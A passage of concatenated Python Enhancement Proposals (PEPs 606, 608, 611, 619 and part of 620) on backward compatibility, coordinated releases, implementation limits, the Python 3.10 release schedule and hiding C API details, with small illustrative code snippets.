min_version must be greater than or equal to (3, 0).
sys.get_python_compat_version(): get the Python compatibility
version. Return a tuple of 3 integers.
A version must be a tuple of 2 or 3 integers. A (major, minor) version
is equivalent to (major, minor, 0).
By default, sys.get_python_compat_version() returns the current
Python version.
For example, to request compatibility with Python 3.8.0:
import sys
import collections
sys.set_python_compat_version((3, 8))
# collections.Mapping alias, removed from Python 3.9, is available
# again, even if collections has been imported before calling
# set_python_compat_version().
parent = collections.Mapping
Obviously, calling sys.set_python_compat_version(version) has no
effect on code executed before the call. Use the -X
compat_version=VERSION command line option or the
PYTHONCOMPATVERSION=VERSION environment variable to set the
compatibility version at Python startup.
Command line
Add -X compat_version=VERSION and -X min_compat_version=VERSION
command line options: call respectively
sys.set_python_compat_version() and
sys.set_python_min_compat_version(). VERSION is a version string
with 2 or 3 numbers (major.minor.micro or major.minor). For
example, -X compat_version=3.8 calls
sys.set_python_compat_version((3, 8)).
Add PYTHONCOMPATVERSION=VERSION and
PYTHONCOMPATMINVERSION=VERSION environment variables: call
respectively sys.set_python_compat_version() and
sys.set_python_min_compat_version(). VERSION is a version
string with the same format as the command line options.
Backwards Compatibility
Introducing the sys.set_python_compat_version() function means that an
application will behave differently depending on the compatibility
version. Moreover, since the version can be decreased multiple times,
the application can behave differently depending on the import order.
Python 3.9 with sys.set_python_compat_version((3, 8)) is not fully
compatible with Python 3.8: the compatibility is only partial.
Security Implications
sys.set_python_compat_version() must not disable security fixes.
Alternatives
Provide a workaround for each incompatible change
An application can work around most incompatible changes which
impact it.
For example, collections aliases can be added back using:
import collections.abc
collections.Mapping = collections.abc.Mapping
collections.Sequence = collections.abc.Sequence
Handle backward compatibility in the parser
The parser is modified to support multiple versions of the Python
language (grammar).
The current Python parser cannot be easily modified for that. AST and
grammar are hardcoded to a single Python version.
In Python 3.8, compile() has an undocumented
_feature_version to not consider async and await as
keywords.
The latest major language backward incompatible change was Python 3.7
which made async and await real keywords. It seems like Twisted
was the only affected project, and Twisted had a single affected
function (it used a parameter called async).
Handling backward compatibility in the parser seems quite complex, not
only to modify the parser, but also for developers who have to check
which version of the Python language is used.
from __future__ import python38_syntax
Add pythonXY_syntax to the __future__ module. It would enable
backward compatibility with Python X.Y syntax, but only for the current
file.
With this option, there is no need to change
sys.implementation.cache_tag to use a different .pyc filename,
since the parser will always produce the same output for the same input
(except for the optimization level).
For example:
from __future__ import python35_syntax
async = 1
await = 2
Update cache_tag
Modify the parser to use sys.get_python_compat_version() to choose
the version of the Python language.
sys.set_python_compat_version() updates
sys.implementation.cache_tag to include the compatibility version
without the micro version as a suffix. For example, Python 3.9 uses
'cpython-39' by default, but
sys.set_python_compat_version((3, 7, 2)) sets cache_tag to
'cpython-39-37'. Changes to the Python language are now allowed
in micro releases.
One problem is that import asyncio is likely to fail if
sys.set_python_compat_version((3, 6)) has been called previously.
The code of the asyncio module requires async and await to
be real keywords (change done in Python 3.7).
Another problem is that regular users cannot write .pyc files into
system directories, and so cannot create them on demand. It means that
.pyc optimization cannot be used in the backward compatibility mode.
One solution for that is to modify the Python installer and Python
package installers to precompile .pyc files not only for the current
Python version, but also for multiple older Python versions (up to
Python 3.0?).
Each .py file would have 3n .pyc files (3 optimization levels),
where n is the number of supported Python versions. For example, it
means 6 .pyc files, instead of 3, to support Python 3.8 and Python
3.9.
Temporary moratorium on incompatible changes
In 2009, PEP 3003 “Python Language Moratorium” proposed a
temporary moratorium (suspension) of all changes to the Python language
syntax, semantics, and built-ins for Python 3.1 and Python 3.2.
In May 2018, during the PEP 572 discussions, it was also proposed to slow
down Python changes: see the python-dev thread Slow down…
Barry Warsaw’s call on this:
I don’t believe that the way for Python to remain relevant and
useful for the next 10 years is to cease all language evolution.
Who knows what the computing landscape will look like in 5 years,
let alone 10? Something as arbitrary as a 10-year moratorium is
(again, IMHO) a death sentence for the language.
PEP 387
PEP 387 – Backwards Compatibility Policy proposes a process to make
incompatible changes. The main point is the 4th step of the process:
See if there’s any feedback. Users not involved in the original
discussions may comment now after seeing the warning. Perhaps
reconsider.
PEP 497
PEP 497 – A standard mechanism for backward compatibility proposes different
solutions to provide backward compatibility.
Except for the __past__ mechanism idea, PEP 497 does not propose
concrete solutions:
When an incompatible change to core language syntax or semantics is
being made, Python-dev’s policy is to prefer and expect that,
wherever possible, a mechanism for backward compatibility be
considered and provided for future Python versions after the
breaking change is adopted by default, in addition to any mechanisms
proposed for forward compatibility such as new future_statements.
Examples of incompatible changes
Python 3.8
Examples of Python 3.8 incompatible changes:
(During beta phase) PyCode_New() required a new parameter: it
broke all Cython extensions (all projects distributing precompiled
Cython code). This change has been reverted during the 3.8 beta phase
and a new PyCode_NewWithPosOnlyArgs() function was added instead.
types.CodeType requires an additional mandatory parameter.
The CodeType.replace() function was added to help projects to no
longer depend on the exact signature of the CodeType constructor.
C extensions are no longer linked to libpython.
sys.abiflags changed from 'm' to an empty string.
For example, python3.8m program is gone.
The C structure PyInterpreterState was made opaque.
Blender:
https://bugzilla.redhat.com/show_bug.cgi?id=1734980#c6
https://developer.blender.org/D6038
XML attribute order: bpo-34160. Broken projects:
coverage
docutils
pcs
python-glyphsLib
Backward compatibility cannot be added for all these changes. For
example, changes in the C API and in the build system are out of the
scope of this PEP.
See What’s New In Python 3.8: API and Feature Removals
for all changes.
See also the Porting to Python 3.8
section of What’s New In Python 3.8.
Python 3.7
Examples of Python 3.7 incompatible changes:
async and await are now reserved keywords.
Several undocumented internal imports were removed. One example is
that os.errno is no longer available; use import errno
directly instead. Note that such undocumented internal imports may be
removed any time without notice, even in micro version releases.
Unknown escapes consisting of '\' and an ASCII letter in
replacement templates for re.sub() were deprecated in Python 3.5,
and will now cause an error.
The asyncio.windows_utils.socketpair() function has been removed:
it was an alias to socket.socketpair().
asyncio no longer exports the selectors and _overlapped
modules as asyncio.selectors and asyncio._overlapped. Replace
from asyncio import selectors with import selectors.
PEP 479 is enabled for all code in Python 3.7, meaning that
StopIteration exceptions raised directly or indirectly in
coroutines and generators are transformed into RuntimeError
exceptions.
socketserver.ThreadingMixIn.server_close() now waits until all
non-daemon threads complete. Set the new block_on_close class
attribute to False to get the pre-3.7 behaviour.
The struct.Struct.format type is now str instead of
bytes.
repr for datetime.timedelta has changed to include the keyword
arguments in the output.
tracemalloc.Traceback frames are now sorted from oldest to most
recent to be more consistent with traceback.
Adding backward compatibility for most of these changes would be easy.
See also the Porting to Python 3.7
section of What’s New In Python 3.7.
Micro releases
Sometimes, incompatible changes are introduced in micro releases
(micro in major.minor.micro) to fix bugs or security
vulnerabilities. Examples include:
Python 3.7.2, compileall and py_compile module: the
invalidation_mode parameter’s default value is updated to None;
the SOURCE_DATE_EPOCH environment variable no longer
overrides the value of the invalidation_mode argument, and
determines its default value instead.
Python 3.7.1, xml modules: the SAX parser no longer processes
general external entities by default to increase security by default.
Python 3.5.2, os.urandom(): on Linux, if the getrandom()
syscall blocks (the urandom entropy pool is not initialized yet), fall
back on reading /dev/urandom.
Python 3.5.1, sys.setrecursionlimit(): a RecursionError
exception is now raised if the new limit is too low at the current
recursion depth.
Python 3.4.4, ssl.create_default_context(): RC4 was dropped from
the default cipher string.
Python 3.4.3, http.client: HTTPSConnection now performs all
the necessary certificate and hostname checks by default.
Python 3.4.2, email.message: EmailMessage.is_attachment() is
now a method instead of a property, for consistency with
Message.is_multipart().
Python 3.4.1, os.makedirs(name, mode=0o777, exist_ok=False):
Before Python 3.4.1, if exist_ok was True and the directory
existed, makedirs() would still raise an error if mode did not
match the mode of the existing directory. Since this behavior was
impossible to implement safely, it was removed in Python 3.4.1
(bpo-21082).
Examples of changes made in micro releases which are not backward
incompatible:
ssl.OP_NO_TLSv1_3 constant was added to 2.7.15, 3.6.3 and 3.7.0
for backwards compatibility with OpenSSL 1.0.2.
typing.AsyncContextManager was added to Python 3.6.2.
The zipfile module accepts a path-like object since Python 3.6.2.
loop.create_future() was added to Python 3.5.2 in the asyncio
module.
No backward compatibility code is needed for these kinds of changes.
References
Accepted PEPs:
PEP 5 – Guidelines for Language Evolution
PEP 236 – Back to the __future__
PEP 411 – Provisional packages in the Python standard library
PEP 3002 – Procedure for Backwards-Incompatible Changes
Draft PEPs:
PEP 602 – Annual Release Cycle for Python
PEP 605 – A rolling feature release stream for CPython
See also withdrawn PEP 598 – Introducing incremental feature
releases
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Rejected | PEP 606 – Python Compatibility Version | Standards Track | Add sys.set_python_compat_version(version) to enable partial
compatibility with requested Python version. Add
sys.get_python_compat_version(). |
PEP 608 – Coordinated Python release
Author:
Miro Hrončok <miro at hroncok.cz>,
Victor Stinner <vstinner at python.org>
Status:
Rejected
Type:
Standards Track
Created:
25-Oct-2019
Python-Version:
3.9
Table of Contents
Abstract
Rationale
Too few projects are involved in the Python beta phase
DeprecationWarning is being ignored
Need to coordinate
Shorter Python release schedule
Specification
Limit the delay
Selected projects
How projects are selected
Incompatible changes
Examples
Cleaning up Python and DeprecationWarning
Distributed CI
Copyright
Abstract
Block a Python release until a compatible version of selected projects
is available.
The Python release manager can decide to release Python even if a
project is not compatible, if they decide that the project is going to
be fixed soon enough, or if the issue severity is low enough.
Rationale
The PEP involves maintainers of the selected projects in the Python
release cycle. There are multiple benefits:
Detect more bugs before a Python final release
Discuss and maybe revert incompatible changes before a Python final
release
Increase the number of compatible projects when the new Python final
version is released
Too few projects are involved in the Python beta phase
Currently, Python beta versions are available four months before the
final 3.x.0 release.
Bugs reported during the beta phase can be easily fixed and can block a
release if they are serious enough.
Incompatible changes are discussed during the beta phase: enhance the
documentation explaining how to update code, or consider reverting these
changes.
Even if more and more projects are tested on the master branch of Python
in their CI, too many of the top 50 PyPI projects are only
compatible with the new Python a few weeks, or even months, after the
final Python release.
DeprecationWarning is being ignored
Python has a well-defined process to deprecate features. A
DeprecationWarning must be emitted during at least one Python release,
before a feature can be removed.
In practice, DeprecationWarning warnings are ignored for years in major
Python projects. Usually, maintainers explain that there are too many
warnings and so they simply ignore warnings. Moreover, DeprecationWarning
is silent by default (except in the __main__ module: PEP 565).
Even if more and more projects are running their test suite with
warnings treated as errors (-Werror), Python core developers still
have no idea how many projects are broken when a feature is removed.
Need to coordinate
When issues and incompatible changes are discovered and discussed after
the final Python release, it becomes way more complicated and expensive
to fix Python. Once an API is part of an official final release, Python
should provide backward compatibility for the whole 3.x release
lifetime. Some operating systems can be shipped with the buggy final
release and can take several months before being updated.
Too many projects are only updated to the new Python after the final
Python release, which makes this new Python version barely usable to run
large applications when Python is released.
It is proposed to block a Python release until a compatible version of
all selected projects is available.
Shorter Python release schedule
The PEP 602: Annual Release Cycle for Python and the PEP 605: A
rolling feature release stream for CPython would like to release
Python more often to ship new features more quickly.
The problem is that each Python 3.x release breaks many projects.
Coordinated Python releases reduce the number of broken projects and
make new Python releases more usable.
Specification
By default, a Python release is blocked until a compatible version of
all selected projects is available.
Before releasing the final Python version, the Python release manager is
responsible for sending a report on the compatibility status of each of
the selected projects. It is recommended to send such a report at
each beta release to track the evolution and detect issues as soon as
possible.
The Python release manager can decide to release Python even if a
project is not compatible, if they decide that the project is going to
be fixed soon enough, or if the issue severity is low enough.
After each Python release, the project list can be updated to remove
projects and add new ones. For example, to remove old unused
dependencies and add new ones. The list can grow if the whole process
doesn’t block Python releases for too long.
Limit the delay
When a build or test issue with the next Python version is reported to a
project, maintainers have one month to answer. With no answer, the
project can be excluded from the list of projects blocking the Python
release.
Multiple projects are already tested on the master branch of Python in a
CI. Problems can be detected very early in a Python release which should
provide enough time to handle them. More CI can be added for projects
which are not tested on the next Python yet.
Once selected projects issues are known, exceptions can be discussed
between the Python release manager and involved project maintainers on a
case-by-case basis. Not all issues deserve to block a Python release.
Selected projects
List of projects blocking a Python release (total: 27):
Projects (13):
aiohttp
cryptography
Cython
Django
numpy
pandas
pip
requests
scipy
Sphinx (needed to build Python)
sqlalchemy
pytest
tox
Direct and indirect dependencies (14):
certifi (needed by urllib3)
cffi (needed by cryptography)
chardet (needed by Sphinx)
colorama (needed by pip)
docutils (needed by Sphinx)
idna (needed by Sphinx and requests)
jinja2 (needed by Sphinx)
MarkupSafe (needed by Sphinx)
psycopg2 (needed by Django)
pycparser (needed by cffi)
setuptools (needed by pip and tons of Python projects)
six (needed by tons of Python projects)
urllib3 (needed by requests)
wheel (needed by pip)
How projects are selected
Projects used to build Python should be in the list, like Sphinx.
Most popular projects are picked from the most downloaded PyPI projects.
Most project dependencies are included in the list as well, since a
single incompatible dependency can block a whole project. Some
dependencies are excluded to reduce the list length.
Test dependencies such as pytest and tox should be included as well. If a
project cannot be tested, a new version cannot be shipped either.
The list should be long enough to have a good idea of the cost of
porting a project to the next Python, but small enough to not block a
Python release for too long.
Obviously, projects which are not part of the list are also encouraged
to report issues with the next Python and to have a CI running on the
next Python version.
Incompatible changes
The definition here is broad: any Python change which causes an issue
when building or testing a project.
See also the PEP 606: Python Compatibility Version for more examples of
incompatible changes.
Examples
There are different kinds of incompatible changes:
Change in the Python build. For example, Python 3.8 removed 'm'
(which stands for pymalloc) from sys.abiflags which impacts Python
vendors like Linux distributions.
Change in the C extensions build. For example, Python 3.8 no longer
links C extensions to libpython, and Python 3.7 removed
os.errno alias to the errno module.
Removed function. For example, collections aliases to ABC classes
have been removed in Python 3.9.
Changed function signature:
Reject a type which was previously accepted (ex: only accept int,
reject float).
Add a new mandatory parameter.
Convert a positional-or-keyword parameter to positional-only.
Behavior change. For example, Python 3.8 now serializes XML attributes
in their insertion order, rather than sorting them by name.
New warning. Since more and more projects are tested with all warnings
treated as errors, any new warning can cause a project test to fail.
Function removed from the C API.
Structure made opaque in the C API. For example, PyInterpreterState
became opaque in Python 3.8 which broke projects accessing
interp->modules (PyImport_GetModuleDict() should be used
instead).
Cleaning up Python and DeprecationWarning
One of the mottos of the Zen of Python (PEP 20) is:
There should be one– and preferably only one –obvious way to do
it.
When Python evolves, new ways inevitably emerge. DeprecationWarning
warnings are emitted to suggest using the new way, but many developers ignore
these warnings, which are silent by default.
Sometimes, supporting both ways has a minor maintenance cost, but Python
core developers prefer to drop the old way to clean up the Python code
base and standard library. Such changes are backward incompatible.
More incompatible changes than usual should be expected with the end of
Python 2 support, which is a good opportunity to clean up old
Python code.
Distributed CI
Checking if selected projects are compatible with the master branch
of Python can be automated using a distributed CI.
Existing CIs can be reused.
New CIs can be added for projects which are not tested on the next
Python yet.
It is recommended to treat DeprecationWarning warnings as errors when
testing on the next Python.
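One simple way to do that, shown here only as an illustrative sketch, is to turn
the warning into an error at the start of the test run:

import warnings

# Fail the test run as soon as any DeprecationWarning is emitted, so that
# incompatibilities with the next Python are caught early.
warnings.simplefilter("error", DeprecationWarning)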
A job testing a project on the next Python doesn’t have to be
“mandatory” (block the whole CI). It is fine to have failures during the
beta phase of a Python release. The job only has to pass for the final
Python release.
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Rejected | PEP 608 – Coordinated Python release | Standards Track | Block a Python release until a compatible version of selected projects
is available. |
PEP 611 – The one million limit
Author:
Mark Shannon <mark at hotpy.org>
Status:
Withdrawn
Type:
Standards Track
Created:
05-Dec-2019
Post-History:
Table of Contents
Abstract
Motivation
Is this a worthwhile trade off?
Rationale
One million
Specification
Recursion depth
Soft and hard limits
Introspecting and modifying the limits
Inferred limits
The advantages for CPython of imposing these limits:
Line of code in a module and code object restrictions.
Total number of classes in a running interpreter
Enforcement
Hard limits in CPython
Backwards Compatibility
Other implementations
General purpose implementations
Special purpose implementations
Security Implications
Reference Implementation
Rejected Ideas
Open Issues
References
Copyright
Abstract
This PEP proposes a soft limit of one million (1 000 000), and a larger hard limit
for various aspects of Python code and its implementation.
The Python language does not specify limits for many of its features.
Not having any limit to these values seems to enhance programmer freedom,
at least superficially, but in practice the CPython VM and other Python virtual
machines have implicit limits or are forced to assume that the limits are
astronomical, which is expensive.
This PEP lists a number of features which are to have a limit of one million.
For CPython the hard limit will be eight million (8 000 000).
Motivation
There are many values that need to be represented in a virtual machine.
If no limit is specified for these values,
then the representation must either be inefficient or vulnerable to overflow.
The CPython virtual machine represents values like line numbers,
stack offsets and instruction offsets by 32 bit values. This is inefficient, and potentially unsafe.
It is inefficient as actual values rarely need more than a dozen or so bits to represent them.
It is unsafe as malicious or poorly generated code could cause values to exceed 2**32.
For example, line numbers are represented by 32 bit values internally.
This is inefficient, given that modules almost never exceed a few thousand lines.
Despite being inefficient, it is still vulnerable to overflow as
it is easy for an attacker to create a module with billions of newline characters.
Memory access is usually a limiting factor in the performance of modern CPUs.
Better packing of data structures enhances locality and reduces memory bandwidth,
at a modest increase in ALU usage (for shifting and masking).
Being able to safely store important values in 20 bits would allow memory savings
in several data structures including, but not limited to:
Frame objects
Object headers
Code objects
There is also the potential for a more efficient instruction format, speeding up interpreter dispatch.
Is this a worthwhile trade off?
The downside of any form of limit is that it might potentially make someone’s job harder,
for example, it may be harder to write a code generator that keeps the size of modules to one million lines.
However, it is the author’s opinion, having written many code generators,
that such a limit is extremely unlikely to be a problem in practice.
The upside of these limits is the freedom it grants implementers of runtimes, whether CPython,
PyPy, or any other implementation, to improve performance.
It is the author’s belief, that the potential value of even a 0.1% reduction in the cost
of running Python programs globally will hugely exceed the cost of modifying a handful of code generators.
Rationale
Imposing a limit on values such as lines of code in a module, and the number of local variables,
has significant advantages for ease of implementation and efficiency of virtual machines.
If the limit is sufficiently large, there is no adverse effect on users of the language.
By selecting a fixed but large limit for these values,
it is possible to have both safety and efficiency whilst causing no inconvenience to human programmers
and only very rare problems for code generators.
One million
The value “one million” is very easy to remember.
The one million limit is mostly a limit on human generated code, not runtime sizes.
One million lines in a single module is a ridiculous concentration of code;
the entire Python standard library is about 2/3rd of a million lines, spread over 1600 files.
The Java Virtual Machine (JVM) [1] specifies a limit of 2**16 - 1 (65535) for many program
elements similar to those covered here.
This limit enables limited values to fit in 16 bits, which is a very efficient machine representation.
However, this limit is quite easily exceeded in practice by code generators and
the author is aware of existing Python code that already exceeds 2**16 lines of code.
The hard limit of eight million fits into 23 bits which, although not as convenient for machine representation,
is still reasonably compact.
A limit of eight million is small enough for efficiency advantages (only 23 bits),
but large enough not to impact users (no one has ever written a module that large).
While it is possible that generated code could exceed the limit,
it is easy for a code generator to modify its output to conform.
The author has hit the 64K limit in the JVM on at least two occasions when generating Java code.
The workarounds were relatively straightforward and wouldn’t
have been necessary with a limit of one million bytecodes or lines of code.
Where necessary, the soft limit can be increased for those programs that exceed the one million limit.
Having a soft limit of one million provides a warning of problematic code, without causing an error and forcing an immediate fix.
It also allows dynamic optimizers to use more compact formats without inline checks.
Specification
This PEP proposes that the following language features and runtime values have a soft limit of one million.
The number of source code lines in a module
The number of bytecode instructions in a code object.
The sum of local variables and stack usage for a code object.
The number of classes in a running interpreter.
The recursion depth of Python code.
It is likely that memory constraints would be a limiting factor before the number of classes reaches one million.
Recursion depth
The recursion depth limit only applies to pure Python code. Code written in a foreign language, such as C,
may consume hardware stack and thus be limited to a recursion depth of a few thousand.
It is expected that implementations will raise an exception should the hardware stack get close to its limit.
For code that mixes Python and C calls, it is most likely that the hardware limit will apply first.
The size of the hardware recursion may vary at runtime and will not be visible.
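For context, the current soft recursion limit is already introspectable and
adjustable from Python code; a minimal sketch:

import sys

print(sys.getrecursionlimit())   # historically 1000 by default
sys.setrecursionlimit(4000)      # e.g. the soft limit this PEP proposes for 3.9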
Soft and hard limits
Implementations should emit a warning whenever a soft limit is exceeded, unless the hard limit has the same value as the soft limit.
When a hard limit is exceeded, then an exception should be raised.
Depending on the implementation, different hard limits might apply. In some cases the hard limit might be below the soft limit.
For example, many MicroPython ports are unlikely to be able to support such large limits.
Introspecting and modifying the limits
One or more functions will be provided in the sys module to introspect or modify the soft limits at runtime,
but the limits may not be raised above the hard limit.
Inferred limits
These limits are not part of the specification, but a limit of less than one million
can be inferred from the limit on the number of bytecode instructions in a code object,
because there would be insufficient instructions to load more than
one million constants or use more than one million names:
The number of distinct names in a code object.
The number of constants in a code object.
The advantages for CPython of imposing these limits:
Line of code in a module and code object restrictions.
When compiling source code to bytecode or modifying bytecode for profiling or debugging,
an intermediate form is required. By limiting operands to 23 bits,
instructions can be represented in a compact 64 bit form allowing
very fast passes over the instruction sequence.
Having 23 bit operands (24 bits for relative branches) allows instructions
to fit into 32 bits without needing additional EXTENDED_ARG instructions.
This improves dispatch, as the operand is strictly local to the instruction.
It is unclear whether this would help performance, it is merely an example of what is possible.
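As a purely illustrative sketch (not CPython’s actual instruction encoding), packing
an 8-bit opcode together with an operand of up to 24 bits into a single 32-bit word
could look like this:

def pack(opcode, operand):
    # 8 bits of opcode in the high byte, up to 24 bits of operand below it.
    assert 0 <= opcode < (1 << 8) and 0 <= operand < (1 << 24)
    return (opcode << 24) | operand

def unpack(word):
    return word >> 24, word & ((1 << 24) - 1)

assert unpack(pack(100, 1_000_000)) == (100, 1_000_000)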
The benefit of restricting the number of lines in a module is primarily the implied limit on bytecodes.
It is more important for implementations that it is instructions per code object, not lines per module, that is limited to one million,
but it is much easier to explain a one million line limit. Having a consistent limit of one million is just easier to remember.
It is most likely, although not guaranteed, that the line limit will be hit first and thus provide an error message that is simpler for the developer to understand.
Total number of classes in a running interpreter
This limit has the potential to reduce the size of object headers considerably.
Currently objects have a two word header, for objects without references
(int, float, str, etc.) or a four word header for objects with references.
By reducing the maximum number of classes, the space for the class reference
can be reduced from 64 bits to fewer than 32 bits allowing a much more compact header.
For example, a super-compact header format might look like this:
struct header {
    uint32_t gc_flags:6;    /* Needs finalisation, might be part of a cycle, etc. */
    uint32_t class_id:26;   /* Can be efficiently mapped to an address by ensuring suitable alignment of classes */
    uint32_t refcount;      /* Limited memory or saturating */
};
This format would reduce the size of a Python object without slots, on a 64 bit machine, from 40 to 16 bytes.
Note that there are two ways to use a 32 bit refcount on a 64 bit machine.
One is to limit each sub-interpreter to 32 GB of memory.
The other is to use a saturating reference count, which would be a little bit slower, but allow unlimited memory allocation.
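To make the saturating option concrete, here is a minimal Python sketch of the behaviour (purely illustrative; CPython’s actual reference counting lives in C, in the object header): once the counter reaches its ceiling it stops changing, so the object is treated as immortal rather than the counter overflowing.

CEILING = 2**32 - 1   # hypothetical maximum for a 32-bit refcount field

def saturating_incref(count):
    # A saturated count stays put instead of wrapping around.
    return count if count == CEILING else count + 1

def saturating_decref(count):
    # Once saturated, the object is never deallocated.
    return count if count == CEILING else count - 1

assert saturating_incref(CEILING) == CEILING
assert saturating_decref(CEILING) == CEILING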
Enforcement
Python implementations are not obliged to enforce the limits.
However, if a limit can be enforced without hurting performance, then it should be.
It is anticipated that CPython will enforce the limits as follows:
The number of source code lines in a module: version 3.9 onward.
The number of bytecode instructions in a code object: 3.9 onward.
The sum of local variables and stack usage for a code object: 3.9 onward.
The number of classes in a running interpreter: probably 3.10 onward, maybe warning in 3.9.
Hard limits in CPython
CPython will enforce a hard limit on all the above values. The value of the hard limit will be 8 million.
It is hypothetically possible that some machine generated code exceeds one or more of the above limits.
The author believes that to be incredibly unlikely and easily fixed by modifying the output stage of the code generator.
We would like to gain the benefit from the above limits for performance as soon as possible.
To that end, CPython will start applying limits from version 3.9 onward.
To ease the transition and minimize breakage, the initial limits will be 16 million, reducing to 8 million in a later version.
Backwards Compatibility
The actual hard limits enforced by CPython will be:
Version        Hard limit
3.9            16 million
3.10 onward    8 million
Given the rarity of code generators that would exceed the one million limits,
and the environments in which they are typically used, it seems reasonable
to start issuing warnings in 3.9 if any limited quantity exceeds one million.
Historically the recursion limit has been set at 1000. To avoid breaking code that implicitly relies on the value being small,
the soft recursion limit will be increased gradually, as follows:
Version    Soft limit
3.9        4 000
3.10       16 000
3.11       64 000
3.12       125 000
3.13       1 million
The hard limit will be set to 8 million immediately.
Other implementations
Implementations of Python other than CPython have different purposes, so different limits might be appropriate.
This is acceptable, provided the limits are clearly documented.
General purpose implementations
General purpose implementations, such as PyPy, should use the one million limit.
If maximum compatibility is a goal, then they should also follow CPython’s behaviour for 3.9 to 3.11.
Special purpose implementations
Special purpose implementations may use lower limits, as long as they are clearly documented.
An implementation designed for embedded systems, for example MicroPython, might impose limits as low as a few thousand.
Security Implications
Minimal. This reduces the attack surface of any Python virtual machine by a small amount.
Reference Implementation
None, as yet. This will be implemented in CPython, once the PEP has been accepted.
Rejected Ideas
Being able to modify the hard limits upwards at compile time was suggested by Tal Einat.
This is rejected as the current limits of 2**32 have not been an issue, and the practical
advantages of allowing limits between 2**20 and 2**32 seem slight compared to the additional
code complexity of supporting such a feature.
Open Issues
None, as yet.
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Withdrawn | PEP 611 – The one million limit | Standards Track | This PEP proposes a soft limit of one million (1 000 000), and a larger hard limit
for various aspects of Python code and its implementation. |
PEP 619 – Python 3.10 Release Schedule
Author:
Pablo Galindo Salgado <pablogsal at python.org>
Status:
Active
Type:
Informational
Topic:
Release
Created:
25-May-2020
Python-Version:
3.10
Table of Contents
Abstract
Release Manager and Crew
Release Schedule
3.10.0 schedule
Bugfix releases
Source-only security fix releases
3.10 Lifespan
Features for 3.10
Copyright
Abstract
This document describes the development and release schedule for
Python 3.10. The schedule primarily concerns itself with PEP-sized
items.
Release Manager and Crew
3.10 Release Manager: Pablo Galindo Salgado
Windows installers: Steve Dower
Mac installers: Ned Deily
Documentation: Julien Palard
Release Schedule
3.10.0 schedule
Note: the dates below use a 17-month development period that results
in a 12-month release cadence between feature versions, as defined by
PEP 602.
Actual:
3.10 development begins: Monday, 2020-05-18
3.10.0 alpha 1: Monday, 2020-10-05
3.10.0 alpha 2: Tuesday, 2020-11-03
3.10.0 alpha 3: Monday, 2020-12-07
3.10.0 alpha 4: Monday, 2021-01-04
3.10.0 alpha 5: Wednesday, 2021-02-03
3.10.0 alpha 6: Monday, 2021-03-01
3.10.0 alpha 7: Tuesday, 2021-04-06
3.10.0 beta 1: Monday, 2021-05-03
(No new features beyond this point.)
3.10.0 beta 2: Monday, 2021-05-31
3.10.0 beta 3: Thursday, 2021-06-17
3.10.0 beta 4: Saturday, 2021-07-10
3.10.0 candidate 1: Tuesday, 2021-08-03
3.10.0 candidate 2: Tuesday, 2021-09-07
3.10.0 final: Monday, 2021-10-04
Bugfix releases
Actual:
3.10.1: Monday, 2021-12-06
3.10.2: Friday, 2022-01-14
3.10.3: Wednesday, 2022-03-16
3.10.4: Thursday, 2022-03-24
3.10.5: Monday, 2022-06-06
3.10.6: Tuesday, 2022-08-02
3.10.7: Tuesday, 2022-09-06
3.10.8: Tuesday, 2022-10-11
3.10.9: Tuesday, 2022-12-06
3.10.10: Wednesday, 2023-02-08
3.10.11: Wednesday, 2023-04-05 (final regular bugfix release with binary
installers)
Source-only security fix releases
Provided irregularly on an “as-needed” basis until October 2026.
3.10.12: Tuesday, 2023-06-06
3.10.13: Thursday, 2023-08-24
3.10 Lifespan
3.10 will receive bugfix updates approximately every 2 months for
approximately 18 months. Some time after the release of 3.11.0 final,
the 11th and final 3.10 bugfix update will be released. After that,
it is expected that security updates (source only) will be released
until 5 years after the release of 3.10 final, so until approximately
October 2026.
Features for 3.10
Some of the notable features of Python 3.10 include:
PEP 604, Allow writing union types as X | Y
PEP 612, Parameter Specification Variables
PEP 613, Explicit Type Aliases
PEP 618, Add Optional Length-Checking To zip
PEP 626, Precise line numbers for debugging and other tools
PEP 634, PEP 635, PEP 636, Structural Pattern Matching
PEP 644, Require OpenSSL 1.1.1 or newer
PEP 624, Remove Py_UNICODE encoder APIs
PEP 597, Add optional EncodingWarning
Copyright
This document has been placed in the public domain.
| Active | PEP 619 – Python 3.10 Release Schedule | Informational | This document describes the development and release schedule for
Python 3.10. The schedule primarily concerns itself with PEP-sized
items. |
PEP 620 – Hide implementation details from the C API
Author:
Victor Stinner <vstinner at python.org>
Status:
Withdrawn
Type:
Standards Track
Created:
19-Jun-2020
Python-Version:
3.12
Table of Contents
Abstract
PEP withdrawn
Motivation
The C API blocks CPython evolutions
Same CPython design since 1990: structures and reference counting
Why is PyPy more efficient than CPython?
PyPy bottleneck: the Python C API
Rationale
Hide implementation details
Relationship with the limited C API
Specification
Summary
Reorganize the C API header files
Move private functions to the internal C API
Convert macros to static inline functions
Make structures opaque
Disallow using Py_TYPE() as l-value
New C API functions must not return borrowed references
Avoid functions returning PyObject**
New pythoncapi_compat.h header file
Process to reduce the number of broken C extensions
Version History
Copyright
Abstract
Introduce C API incompatible changes to hide implementation details.
Once most implementation details are hidden, the evolution of CPython
internals will be less limited by C API backward compatibility issues.
It will be much easier to add new features.
It becomes possible to experiment with more advanced optimizations in
CPython than just micro-optimizations, like tagged pointers.
Define a process to reduce the number of broken C extensions.
The implementation of this PEP is expected to be done carefully over
multiple Python versions. It already started in Python 3.7 and most
changes are already completed. The Process to reduce the number of
broken C extensions dictates the rhythm.
PEP withdrawn
This PEP was withdrawn by its author since the scope is too broad and the work is
distributed over multiple Python versions, which makes it difficult to make
a decision on the overall PEP. It was split into new PEPs with
narrower and better defined scopes, like PEP 670.
Motivation
The C API blocks CPython evolutions
Adding or removing members of C structures causes multiple backward
compatibility issues.
Adding a new member breaks the stable ABI (PEP 384), especially for
types declared statically (e.g. static PyTypeObject MyType =
{...};). In Python 3.4, the PEP 442 “Safe object finalization” added
the tp_finalize member at the end of the PyTypeObject structure.
For ABI backward compatibility, a new Py_TPFLAGS_HAVE_FINALIZE type
flag was required to announce if the type structure contains the
tp_finalize member. The flag was removed in Python 3.8 (bpo-32388).
The PyTypeObject.tp_print member, deprecated since Python 3.0
released in 2008, has been removed in the Python 3.8 development cycle.
But the change broke too many C extensions and had to be reverted before
3.8 final release. Finally, the member was removed again in Python 3.9.
C extensions rely on the ability to access structure members,
indirectly through the C API, or even directly. Modifying structures
